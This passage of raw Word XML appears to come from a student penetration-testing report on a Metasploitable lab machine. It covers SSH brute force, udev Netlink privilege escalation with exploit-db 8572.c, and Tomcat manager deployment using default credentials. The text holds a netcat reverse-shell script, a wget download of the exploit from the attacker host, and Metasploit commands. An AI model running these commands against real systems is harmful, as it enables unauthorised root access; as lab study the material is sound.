    </w:p>
    <w:p w14:paraId="6323C893" w14:textId="1E4C10CD" w:rsidR="005231AC" w:rsidRPr="005231AC" w:rsidRDefault="005231AC" w:rsidP="002873B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc155118309"/>
      <w:r>
        <w:t>Brute force ssh</w:t>
      </w:r>
      <w:r w:rsidR="00852076">
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>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Got me in to the session as msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D26F8EB" w14:textId="282BED93" w:rsidR="001B7057" w:rsidRDefault="001B7057" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">I re-ran and I was able to brute force the root to using the same </w:t>
      </w:r>
      <w:r w:rsidR="00894A1A">
        <w:t>method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D81280" w14:textId="6BAA0D8E" w:rsidR="0080133C" w:rsidRDefault="0017668D" w:rsidP="0017668D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc155118310"/>
      <w:r w:rsidRPr="0017668D">
        <w:lastRenderedPageBreak/>
        <w:t>Linux udev Netlink Local Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="468C20A8" w14:textId="59DF9672" w:rsidR="001B7057" w:rsidRDefault="0080133C" w:rsidP="00101BC7">
      <w:r w:rsidRPr="0080133C">
        <w:t>use exploit/linux/local/udev_netlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4152C" w14:textId="033FA02B" w:rsidR="00CE4DA1" w:rsidRDefault="00CE4DA1" w:rsidP="00101BC7">
      <w:r>
        <w:t>show info</w:t>
      </w:r>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5450840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="020B986F" w14:textId="5F7F0DBE" w:rsidR="00DA362E" w:rsidRDefault="007E16ED" w:rsidP="004E0623">
      <w:r>
        <w:t xml:space="preserve">I was then able to use a session from a different attack to escalate </w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="_Toc155118311"/>
      <w:r w:rsidR="004E0623">
        <w:t>privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E20D05" w14:textId="2FEA3652" w:rsidR="004E0623" w:rsidRDefault="004E0623" w:rsidP="004E0623">
      <w:r>
        <w:t>I used an exploit to get a session, then ctrl+z to breakout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01241033" w14:textId="299B1421" w:rsidR="004E0623" w:rsidRDefault="004E0623" w:rsidP="004E0623">
      <w:r>
        <w:t>Then use the sessions command to ensure it was still open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320654C5" w14:textId="5FC4D027" w:rsidR="004E0623" w:rsidRDefault="004E0623" w:rsidP="004E0623">
      <w:r w:rsidRPr="004E0623">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C724DA0" wp14:editId="46CD6686">
            <wp:extent cx="5731510" cy="1214120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1392630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0839" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1214120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44107D8E" w14:textId="77777777" w:rsidR="00D93810" w:rsidRDefault="00D93810" w:rsidP="004E0623"/>
    <w:p w14:paraId="7B46D202" w14:textId="77777777" w:rsidR="004E0623" w:rsidRDefault="004E0623" w:rsidP="004E0623"/>
    <w:p w14:paraId="29BE3C8A" w14:textId="0172DF89" w:rsidR="004E0623" w:rsidRDefault="004E0623" w:rsidP="004E0623">
      <w:r w:rsidRPr="004E0623">
        <w:t>use exploit/linux/local/udev_netlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E26D3" w14:textId="7AEE2C1D" w:rsidR="004E0623" w:rsidRDefault="00D93810" w:rsidP="004E0623">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F37141F" w14:textId="35E70FA9" w:rsidR="00D93810" w:rsidRDefault="00D93810" w:rsidP="004E0623">
      <w:r w:rsidRPr="00D93810">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5090DF" wp14:editId="739936ED">
            <wp:extent cx="5731510" cy="1712595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="12534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731" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1712595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F064D9" w14:textId="7419133C" w:rsidR="004E0623" w:rsidRDefault="00D93810" w:rsidP="004E0623">
      <w:r w:rsidRPr="00D93810">
        <w:t xml:space="preserve">its finding a pid but failing to </w:t>
      </w:r>
      <w:r>
        <w:t>create a session</w:t>
      </w:r>
      <w:r w:rsidR="008B007E">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03A368" w14:textId="7DCEEC4F" w:rsidR="008B007E" w:rsidRDefault="008B007E" w:rsidP="004E0623">
      <w:r>
        <w:t>lets see whats going on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AB3BC" w14:textId="4D6DAB24" w:rsidR="008B007E" w:rsidRDefault="008B007E" w:rsidP="004E0623">
      <w:r>
        <w:t>ssessions -i 1 will allow me to use that session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FE1CC" w14:textId="4CF2BB9A" w:rsidR="008B007E" w:rsidRDefault="008B007E" w:rsidP="004E0623">
      <w:r w:rsidRPr="008B007E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1713DA77" wp14:editId="7D8C192B">
            <wp:extent cx="5731510" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="6195389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8975" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1464310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BAA51" w14:textId="0489F7B6" w:rsidR="005924DD" w:rsidRDefault="005924DD" w:rsidP="004E0623">
      <w:r>
        <w:t>Cat /proc/net/netlink to list the pids we find the pid udev has detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65559555" w14:textId="206B29B0" w:rsidR="00D93810" w:rsidRDefault="005924DD" w:rsidP="004E0623">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="462D5B0D" wp14:editId="67E4AB5C">
            <wp:extent cx="5743277" cy="2658467"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="19007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9063" cy="2661145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C07FFFF" w14:textId="63939784" w:rsidR="005924DD" w:rsidRDefault="005924DD" w:rsidP="004E0623">
      <w:r w:rsidRPr="005924DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30289392" wp14:editId="21779D9B">
            <wp:extent cx="5731510" cy="1396365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17698334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3493" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1396365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E267AE" w14:textId="29E83062" w:rsidR="005924DD" w:rsidRDefault="005924DD" w:rsidP="004E0623">
      <w:r>
        <w:t>Actually root looks like to be using 2827</w:t>
      </w:r>
      <w:r w:rsidR="00D81403">
        <w:t xml:space="preserve"> I set this manually and I go the same error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C3C4BF" w14:textId="72CD60DF" w:rsidR="00D50252" w:rsidRDefault="00D81403" w:rsidP="00D50252">
      <w:r>
        <w:t xml:space="preserve">Investigating a script on </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00621661">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/8572</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> but its refusing to </w:t>
      </w:r>
      <w:r w:rsidR="00577E82">
        <w:t>compile</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95837F" w14:textId="77777777" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t>Kali Linux itself has an open source tool called </w:t>
      </w:r>
      <w:r w:rsidRPr="003B002E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SearchSploit </w:t>
      </w:r>
      <w:r w:rsidRPr="003B002E">
        <w:t>pre-installed in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E26FFC" w14:textId="77777777" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t>Searchsploit is nothing but a database which contains various exploits related to Kernel level, system level and application level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEEF003" w14:textId="63B1D4FC" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="003B002E">
        <w:t>ooking for a privilege escalation exploit which takes advantage of flaw in UDEV device manager, allowing for remote code execution via unverified Netlink message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A7848" w14:textId="77777777" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In computer security, an exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34655027" w14:textId="77777777" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t>To search this kind of exploit with Searchsploit, the command is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0B485" w14:textId="77777777" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t>Command: searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61602E43" w14:textId="3844B23F" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t xml:space="preserve">Since we’re only looking for privilege escalation exploit, and the best one among above list is 8572.c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBA69E" w14:textId="3889E3E4" w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E" w:rsidP="003B002E">
      <w:r w:rsidRPr="003B002E">
        <w:t xml:space="preserve"> “locate 8572.c” to find out the path of the exploit which is /usr/share/exploitdb/exploits/linux/local/8572.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D460740" w14:textId="77777777" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t>Most of the exploits are coded in c language and you just need to compile the exploit with gcc compiler and run the exploit against the target. But before to do this, make sure that your apache service must be in active state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DE6CF" w14:textId="77777777" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t>Next, we can make a symbolic link between the directory where the exploit is located and the directory that serves files on the server. This will make the exploit available to download directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC530A" w14:textId="229E3F00" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t>ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1200E" w14:textId="77777777" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t>exploit will run from the /tmp directory on the target, so first we need to create the file that will execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F767C4" w14:textId="5EC689F4" w:rsidR="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r>
        <w:t>the attacking host</w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:t xml:space="preserve"> type gedit /var/www/html/run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE5465" w14:textId="44BBB2C6" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r>
        <w:t>And tenter these lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214A0EF" w14:textId="4FCA8687" w:rsidR="0068754C" w:rsidRPr="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r w:rsidRPr="0068754C">
        <w:t>#! /bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:br/>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:t>192.168.254.182</w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:t>6559</w:t>
      </w:r>
      <w:r w:rsidRPr="0068754C">
        <w:t xml:space="preserve"> -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C2962" w14:textId="08F2BBB3" w:rsidR="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r>
        <w:t xml:space="preserve">When this file is executed, it will use Netcat to connect to Kali’s IP address on port </w:t>
      </w:r>
      <w:r>
        <w:t>6559</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and spawn a shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or at least we hope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA3487" w14:textId="77777777" w:rsidR="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C"/>
    <w:p w14:paraId="27DCA134" w14:textId="77777777" w:rsidR="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C"/>
    <w:p w14:paraId="279870B0" w14:textId="27EC8B23" w:rsidR="0068754C" w:rsidRDefault="0068754C" w:rsidP="0068754C">
      <w:r>
        <w:t xml:space="preserve">Set now to </w:t>
      </w:r>
      <w:r>
        <w:t>upload the files to the target. Back in our low-level shell, change into the /tmp directory by typing “cd /tmp” and use the wget utility to connect to the server running on Kali and transfer the files onto the target machine</w:t>
      </w:r>
      <w:r w:rsidR="00A25E5E">
        <w:t xml:space="preserve"> using “</w:t>
      </w:r>
      <w:r w:rsidR="00A25E5E">
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="00A25E5E" w:rsidRPr="00F134DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidR="00A25E5E" w:rsidRPr="00F134DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>192.168.254.182/local</w:t>
        </w:r>
        <w:r w:rsidR="00A25E5E" w:rsidRPr="00F134DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00A25E5E" w:rsidRPr="00F134DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A25E5E">
        <w:t xml:space="preserve">” and run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A872D" w14:textId="07B5B402" w:rsidR="00A25E5E" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r>
        <w:t>Ls to ensure things as they should be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B384CBC" w14:textId="136E0F45" w:rsidR="0068754C" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r w:rsidRPr="00A25E5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004C95C0" wp14:editId="15198566">
            <wp:extent cx="2133898" cy="1390844"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212832970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29708" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2133898" cy="1390844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75409009" w14:textId="2337704F" w:rsidR="00A25E5E" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r>
        <w:t>Makesure we listening on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F1DB1" w14:textId="35A0B906" w:rsidR="00A25E5E" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r w:rsidRPr="00A25E5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E6E954" wp14:editId="7820F125">
            <wp:extent cx="5731510" cy="529590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="80348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5587" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="529590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4AD56" w14:textId="157EC551" w:rsidR="00A25E5E" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r>
        <w:t>Run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24E7BB" w14:textId="0F6A30E6" w:rsidR="00A25E5E" w:rsidRDefault="00A25E5E" w:rsidP="0068754C">
      <w:r>
        <w:t xml:space="preserve">./Exploit </w:t>
      </w:r>
      <w:r w:rsidR="00827033">
        <w:t>2827</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D16E43" w14:textId="303BB394" w:rsidR="004A284B" w:rsidRDefault="004A284B" w:rsidP="0068754C">
      <w:r>
        <w:t>We than get a reverse shell as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EEAC89" w14:textId="06472E18" w:rsidR="00DF55D0" w:rsidRDefault="004A284B" w:rsidP="0068754C">
      <w:r w:rsidRPr="004A284B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2D2C24" wp14:editId="30E6C5BA">
            <wp:extent cx="1645113" cy="616917"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="156506425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64258" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1658019" cy="621757"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1012C2" w14:textId="5A1A7A48" w:rsidR="007D2B9F" w:rsidRPr="008314C5" w:rsidRDefault="007D2B9F" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="008314C5">
        <w:t>Port 8180</w:t>
      </w:r>
      <w:r w:rsidR="008E4971">
        <w:t xml:space="preserve"> Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="09E9D642" w14:textId="639B0B39" w:rsidR="007D2B9F" w:rsidRDefault="007D2B9F" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">First let’s see what’s running on 8180   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE730BF" w14:textId="1344A65A" w:rsidR="007D2B9F" w:rsidRDefault="000F091D" w:rsidP="007D2B9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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 xml:space="preserve">(CVE  2007-2447):http://www.cvedetails.com/cve/cve-2007-2447  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70749E81" w14:textId="49282640" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We think we know what the username and password is but shall we check?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E416350" w14:textId="655D7907" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="004D374B">
        <w:t>se auxiliary/admin/http/tomcat_administration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55A3A7" w14:textId="3B07FD35" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r w:rsidRPr="004D374B">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989D180" w14:textId="53B852A7" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r>
        <w:t>set HOSTS 192.168.254.186#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595ECB4" w14:textId="135F1E1B" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40471191" w14:textId="4F99503A" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r w:rsidRPr="004D374B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A794C4" wp14:editId="1998A0AB">
            <wp:extent cx="5731510" cy="2528570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="79879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4781" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2528570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E6E8C4" w14:textId="153A8DC4" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970">
      <w:r>
        <w:t xml:space="preserve">Now use an exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="004D374B">
        <w:t xml:space="preserve">tomcat_mgr_deploy   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2EE7E" w14:textId="77777777" w:rsidR="004D374B" w:rsidRDefault="004D374B" w:rsidP="00741970"/>
    <w:p w14:paraId="00702C8E" w14:textId="370D8F5B" w:rsidR="000F091D" w:rsidRDefault="00741970" w:rsidP="00741970">
      <w:r>
        <w:t xml:space="preserve">use exploit/multi/http/tomcat_mgr_deploy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79"/>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HttpUsername tomcat </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760FB50" w14:textId="77777777" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set HttpPassword tomcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2CC9E" w14:textId="51C28973" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set  RHOST 192.168.254.186 set  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CB5C5" w14:textId="6E1FA9C1" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">RPORT 8180 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57820499" w14:textId="1E66B926" w:rsidR="00062B58" w:rsidRDefault="00AB4A6A" w:rsidP="00062B58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
